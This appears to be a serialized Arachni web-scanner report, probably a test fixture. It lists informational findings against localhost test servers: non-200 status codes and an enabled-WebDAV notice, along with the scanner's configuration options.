!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/406
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 406'
:element: server
:regexp: ''
var:
url: http://localhost:10473/406
injected:
id: ! 'Code: 406'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4063228'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: true
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/408
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 408'
:element: server
:regexp: ''
var:
url: http://localhost:10473/408
injected:
id: ! 'Code: 408'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4083910'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/409
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 409'
:element: server
:regexp: ''
var:
url: http://localhost:10473/409
injected:
id: ! 'Code: 409'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4099705'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/411
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 411'
:element: server
:regexp: ''
var:
url: http://localhost:10473/411
injected:
id: ! 'Code: 411'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4117224'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/412
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 412'
:element: server
:regexp: ''
var:
url: http://localhost:10473/412
injected:
id: ! 'Code: 412'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4129364'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/410
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 410'
:element: server
:regexp: ''
var:
url: http://localhost:10473/410
injected:
id: ! 'Code: 410'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4106967'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/413
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 413'
:element: server
:regexp: ''
var:
url: http://localhost:10473/413
injected:
id: ! 'Code: 413'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4136305'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/414
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 414'
:element: server
:regexp: ''
var:
url: http://localhost:10473/414
injected:
id: ! 'Code: 414'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '414796'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/415
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 415'
:element: server
:regexp: ''
var:
url: http://localhost:10473/415
injected:
id: ! 'Code: 415'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4154386'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/416
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 416'
:element: server
:regexp: ''
var:
url: http://localhost:10473/416
injected:
id: ! 'Code: 416'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4166752'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/417
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 417'
:element: server
:regexp: ''
var:
url: http://localhost:10473/417
injected:
id: ! 'Code: 417'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4174639'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/418
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 418'
:element: server
:regexp: ''
var:
url: http://localhost:10473/418
injected:
id: ! 'Code: 418'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4181819'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/420
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 420'
:element: server
:regexp: ''
var:
url: http://localhost:10473/420
injected:
id: ! 'Code: 420'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4201223'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/422
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 422'
:element: server
:regexp: ''
var:
url: http://localhost:10473/422
injected:
id: ! 'Code: 422'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4227446'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
WebDAV.org: http://www.webdav.org/specs/rfc4918.html
Wikipedia: http://en.wikipedia.org/wiki/WebDAV
var:
url: http://localhost:12297/
elem: server
method: OPTIONS
name: WebDAV
description: ! "WebDAV is enabled on the server.\n Consider auditing further
using a specialised tool."
tags:
- webdav
- options
- methods
- server
severity: Informational
remedy_guidance: Disable WebDAV if not required. If it is required, perform an audit
using specialized tools.
mod_name: WebDAV
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebDAV.org: http://www.webdav.org/specs/rfc4918.html
Wikipedia: http://en.wikipedia.org/wiki/WebDAV
opts:
:element: server
:regexp: ''
var:
url: http://localhost:12297/
injected:
id:
regexp: ''
regexp_match:
elem: server
remarks: {}
method: OPTIONS
response: Content-TypeAllow
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "QWxsb3c=": !binary |-
U1RVRkYsIFBST1BGSU5E
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NyBHTVQ=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: WebDAV
description: ! "WebDAV is enabled on the server.\n Consider auditing further
using a specialised tool."
tags:
- webdav
- options
- methods
- server
severity: Informational
remedy_guidance: Disable WebDAV if not required. If it is required, perform an
audit using specialized tools.
mod_name: WebDAV
variations: []
internal_modname: WebDav
internal_modname: WebDav
options:
dir:
root: /home/zapotek/workspace/arachni/
gfx: /home/zapotek/workspace/arachni/gfx/
conf: /home/zapotek/workspace/arachni/conf/
logs: /home/zapotek/workspace/arachni/logs/
data: /home/zapotek/workspace/arachni/data/
modules: /home/zapotek/workspace/arachni/modules/
reports: /home/zapotek/workspace/arachni/reports/
plugins: /home/zapotek/workspace/arachni/plugins/
rpcd_handlers: /home/zapotek/workspace/arachni/rpcd_handlers/
path_extractors: /home/zapotek/workspace/arachni/path_extractors/
lib: /home/zapotek/workspace/arachni/lib/arachni/
mixins: /home/zapotek/workspace/arachni/lib/arachni/mixins/
arachni: /home/zapotek/workspace/arachni/lib/arachni
user_agent: Arachni/v1.0dev
http_timeout: 50000
datastore: {}
redundant: {}
https_only: false
obey_robots_txt: false
fuzz_methods: false
audit_cookies_extensively: false
exclude_binaries: false
auto_redundant:
depth_limit:
link_count_limit:
redirect_limit: 20
lsmod: []
lsrep: []
http_req_limit: 20
mods: []
reports: {}
exclude: []
exclude_body: []
exclude_cookies: []
exclude_vectors: []
include: []
lsplug: []
plugins: {}
rpc_instance_port_range:
- 1025
- 65535
load_profile: []
restrict_paths: []
extend_paths: []
custom_headers: {}
min_pages_per_instance: 30
max_slaves: 10
url: http://test.com/
audit_forms: true
audit_links: true
audit_cookies: true
audit_headers: true
start_datetime: !binary |-
TW9uIEZlYiAxMSAwODoxOTo1MyAyMDEz
finish_datetime: !binary |-
